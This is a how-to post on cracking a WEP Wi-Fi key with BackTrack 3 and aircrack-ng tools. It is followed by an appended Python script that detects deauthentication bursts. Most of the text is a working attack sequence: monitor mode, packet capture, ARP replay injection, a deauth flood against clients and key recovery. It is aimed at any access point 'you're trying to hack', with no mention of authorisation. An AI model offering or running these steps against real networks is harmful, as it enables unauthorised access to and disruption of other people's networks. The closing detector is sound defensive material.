The first thing we are going to do is install BackTrack 3 onto an SD card so we can boot from the SD card without having to mess up our currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet. Here is the article I followed. Apparently the article which I followed has been taken down, but a quick google search should find another.
After you have booted into BackTrack 3, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:
ifconfig ath0 down
Next we want to bring it back up, but in monitor mode:
airmon-ng start wifi0
You should see that a new interface called ath1 was created. That is the interface we are going to use for the rest of our cracking. Next:
airodump-ng ath1
This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don't want to write them down, just open a new shell and leave that one open.
Now press ctrl+c to stop airodump-ng. Open a new console (if you haven't already) and type:
airodump-ng --channel x --bssid y -w filename ath1
Where x and y are the channel and bssid that you wrote down, respectively, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I'm searching through my cracked WEP files I know what's what.
Now leave that running and open another shell. Type:
ifconfig
Next to ath1, write down the first 6 sets of numbers in the long string next to HWaddr, replacing the dashes with colons (e.g. 00:11:22:33:44:55). That is your computer's MAC address, whereas the bssid is the Access Point's MAC address that you're trying to hack.
Okay, now in the same window that you typed ifconfig, type:
aireplay-ng --arpreplay -b [Access Point's MAC] -h [Your MAC] ath1
Now leave that running and open yet another shell, and type:
aireplay-ng --deauth 5 -c [Your Mac] -a [Access Point's MAC] ath1
Now in that same window type:
aircrack-ng filename*.cap
Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arise.
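A defender-side check to go with this procedure (an added example, not part of the original tutorial): the burst of deauthentication frames sent by the aireplay-ng --deauth step above is exactly the pattern a wireless IDS alerts on. The script below runs over a constructed list of 802.11 management frames rather than a real capture; the frame tuples, MAC addresses, window size and threshold are all assumptions.

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 management frames (not from a real capture):
# (timestamp_seconds, frame_subtype, source_mac, destination_mac)
SAMPLE_FRAMES = [
    (0.00, "beacon",     "AA:BB:CC:00:00:01", "FF:FF:FF:FF:FF:FF"),
    (0.10, "probe_resp", "AA:BB:CC:00:00:01", "DE:AD:BE:EF:00:01"),
    (1.00, "deauth",     "AA:BB:CC:00:00:01", "DE:AD:BE:EF:00:01"),
    (1.02, "deauth",     "AA:BB:CC:00:00:01", "DE:AD:BE:EF:00:01"),
    (1.04, "deauth",     "AA:BB:CC:00:00:01", "DE:AD:BE:EF:00:01"),
    (1.06, "deauth",     "AA:BB:CC:00:00:01", "DE:AD:BE:EF:00:01"),
    (1.08, "deauth",     "AA:BB:CC:00:00:01", "DE:AD:BE:EF:00:01"),
    # A second AP that deauths one client twice, over a minute apart:
    # normal housekeeping, should not trip the detector.
    (30.0, "deauth",     "AA:BB:CC:00:00:02", "DE:AD:BE:EF:00:02"),
    (95.0, "deauth",     "AA:BB:CC:00:00:02", "DE:AD:BE:EF:00:02"),
]


def detect_deauth_bursts(frames, window_s=2.0, threshold=5):
    """Flag every (AP, client) pair that sends at least `threshold`
    deauthentication frames inside any sliding window of `window_s` seconds.

    A real AP rarely deauthenticates the same client several times per
    second, so a burst like this is a strong sign that someone is forcing
    the client to reconnect (which is what the --deauth step above does).
    Returns one alert per pair, raised the first time the threshold is hit.
    """
    recent = defaultdict(deque)   # (src, dst) -> timestamps still in window
    alerted = set()
    alerts = []
    for ts, subtype, src, dst in sorted(frames):
        if subtype != "deauth":
            continue
        key = (src, dst)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_s:   # drop frames that aged out
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": src, "client": dst,
                           "start": q[0], "count": len(q)})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: AP {a['bssid']} -> client {a['client']} "
              f"({a['count']} frames from t={a['start']}s)")
```

On the sample data this reports a single burst from the first AP; the same logic works on frames pulled from a monitor-mode capture once they are reduced to the same four fields. The only real fix for the WEP weakness the tutorial exploits is to stop running WEP at all.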